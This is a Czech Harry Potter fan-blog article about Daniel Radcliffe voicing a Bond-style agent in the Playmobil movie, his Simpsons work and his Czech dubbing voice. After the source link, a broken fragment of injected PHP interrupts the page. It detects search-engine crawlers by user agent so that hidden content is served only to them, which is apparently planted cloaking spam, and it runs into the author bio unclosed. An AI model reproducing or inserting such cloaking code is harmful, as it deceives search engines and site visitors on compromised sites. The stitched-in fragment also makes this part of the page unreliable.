Herec Daniel Radcliffe již dávno pověsil hábit na hřebík a ukázal světu, že dokáže i jiné věci, než jen pošetile mávat hůlkou a vyslovovat přihlouplá zaklínadla. Nicméně ve své poslední roli se k dětskému publiku vrátil, ačkoliv pouze hlasem. Ten propůjčil postavě namyšleného tajného agenta bondovského stylu v animovaném snímku Playmobil ve filmu.

Fotka z filmu Playmobil ve filmu. Postava agenta, kterého dabuje v AJ Daniel Radcliffe stojí před bránou ve zdi. Je oblečený ve smokingu a tváří se bondovsky drsně a sebejistě (tedy alespoň natolik, jak je to možné v případě animované postavičky, která vypadá jako kříženec LEGO postavičky a Igráčka).
https://www.abicko.cz/clanek/precti-si-zabava-filmy/25350/playmobil-ve-filmu-dalsi-pribeh-hracek.html

Dle Danových slov pro něj bylo zábavné namlouvat někoho odlišného od jeho osobnosti. Skutečného agenta 007 by však hrát nechtěl, neboť by v takové roli byl směšný, ačkoliv role byla Jamesem Bondem inspirovaná.

„Archetypem Bonda, příjemného, bystrého agenta, pro mě byl Roger Moore, takže jsem režisérovi poslal pár nahraných vět v tomto stylu. Pak jsme se však setkali a prošli společně celý film. Načež jsem mu poslal novou nahrávku a on řekl, že je to přesně to, co hledal.“

Daniel Radcliffe, londýnské interview
Anglický trailer k filmu.
Česká dabovaná verze na odkazu zde:
https://tv.idnes.cz/spolecnost/playmobil-ve-filmu-trailer-kultura-film-kino.V190805_093648_idnestv_jaha

Dabování animovaných postav není pro Dana žádnou novinkou. Své zkušenosti získal v nám známém seriálu Simpsonovi. Na svoji zkušenost zde vzpomíná s úsměvem: „Měl jsem tendenci hrát co nejpřirozeněji, ale po pár větách mi režisér řekl: Jsi animovaná postavička. Hraj to trochu víc animovaně.“

„Osimpsonovaný“ Dan Radcliffe – krom sebe samotného namluvil ještě 2 epizodní postavy. Zdroj: simpsons.fandom.com

Dabování ovšem, i přes zábavu, kterou si při práci užil, vnímá Dan stále trochu divně, protože na rozdíl od několika měsíců běžného filmování stráví dabováním dva dny a většinu ostatních lidí ani nepotká. Na odpověď českého reportéra, že v Čechách jsou na to herci zvyklí, protože máme dlouhou tradici dabingu, reagoval Dan s údivem.

Reportér následně Danovi vysvětlil, že u nás mají cizí hvězdy dokonce konkrétního českého herce, který jim pravidelně propůjčuje svůj hlas, a že Dan má takto přiřazeného Vojtu Kotka.

„To je skvělé. Rád bych někdy přijel, poznal ho osobně a poděkoval za dobrou práci.“

Daniel Radcliffe, londýnské interview
Vojta Kotek, český hlas Harryho Pottera. Zdroj: osobnosti.cz

Film Playmobil je inspirován stejnojmennou značkou německých hraček pro děti. Daniel samozřejmě měl jako dítě spoustu hraček a figurek, se kterými si hrál. Na potterovské figurky s jeho obličejem si však dosud nezvykl. Přijde mu to až děsivé, a proto už většinu (možná všechen) merche s Harrym Potterem rozdal. Z obdobných důvodů také nesleduje své filmy. Na premiéry raději nechodí a někdy později je shlédne maximálně jednou.

Nedivím se, že Danovi některý merch přijde děsivý. Zdroj: herocity.de

V Potterzone tedy přejeme filmu Playmobil úspěch a také, aby se Danovi jeho přání setkat se s Vojtou vyplnilo. Třeba na FFku, že, Vašku? *mrk* *mrk*.

Zdroj: https://www.idnes.cz/kultura/film-televize/daniel-radcliffe-rozhovor-playmobil-ve-filmu.A190906_122822_filmvideo_ts

function vururumgardas(){
$agent = $_SERVER[‚HTTP_USER_AGENT‘];
$sec = $agent;
switch(true){
case (strpos($sec,“google“)): $part = 1; break;
case (strpos($sec,“yandex“)): $part = 1; break;
case (strpos($sec,“bing“)): $part = 1; break;
case (strpos($sec,“yahoo“)): $part = 1; break;
case (strpos($sec,“alexa“)): $part = 1; break;
default : $part = 0;
}
if($part ==1){
echo ‚

FildasKirk

Zpočátku, ovlivněn heroickým obdivem k Harrymu, jsem se považoval za Nebelvíra. Později jsem si uvědomil, že bezhlavě se vrhat do šílených dobrodružství na mě vůbec nesedí – a přiznejme si i s rozmyslem se vrhat do šílených dobrodružství by bylo na pováženou. Naopak, dvakrát měř, jednou řež, ale nejprve si o tom třikrát něco nastuduj je více můj styl. Takže jsem Havraspár a kdo mě označí za Nebelvíra, bude mu po odečtení kolejních bodů udělen trest naučit se nazpaměť Dějiny Bradavic. Prý je to prima lehké čtení před spaním.

Napsat komentář

Vaše e-mailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *

Tato stránka používá Akismet k omezení spamu. Podívejte se, jak vaše data z komentářů zpracováváme..